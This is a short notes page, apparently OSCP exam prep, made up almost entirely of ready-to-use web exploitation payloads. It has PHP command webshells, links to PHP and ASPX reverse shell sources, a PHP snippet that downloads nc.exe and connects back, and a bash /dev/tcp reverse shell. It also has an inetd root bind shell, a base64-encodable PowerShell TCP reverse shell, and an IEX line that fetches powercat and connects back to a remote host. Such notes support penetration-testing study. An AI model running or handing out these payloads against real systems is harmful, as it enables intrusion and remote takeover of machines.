// notes/ Web Exploitation
🕸️

Payloads

{% embed url="<https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/phpreverseshell.php" %}

#web applications#adot8
source · oscp.adot8.com · web-applications/payloads

Payloads

{% embed url="https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php" %}

{% embed url="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx" %}

php
01system("powershell -c curl http://10.10.14.6/nc.exe -o C:\\programdata\\nc.exe");
02system("C:\\programdata\\nc.exe 10.10.14.6 1337 -e powershell.exe");
php
01
02<?php system($_GET['cmd']) ?>
03<?php system($_REQUEST['cmd']) ?>
04<?php echo shell_exec($_GET['cmd']); ?>
05<?php echo shell_exec($_REQUEST['cmd']); ?>
06
code
01bash -c 'bash -i >& /dev/tcp/192.168.45.204/1337 0>&1'
code
01echo '31337 stream tcp nowait root /bin/sh -i'

Base64 encoded win

code
01pwsh
code
01$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.237",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
code
01$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
02$EncodedText =[Convert]::ToBase64String($Bytes)
03$EncodedText
code
01powershell -e <payload>
code
01powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8080/powercat.ps1');powercat -c 192.168.45.173 -p 1337 -e powershell"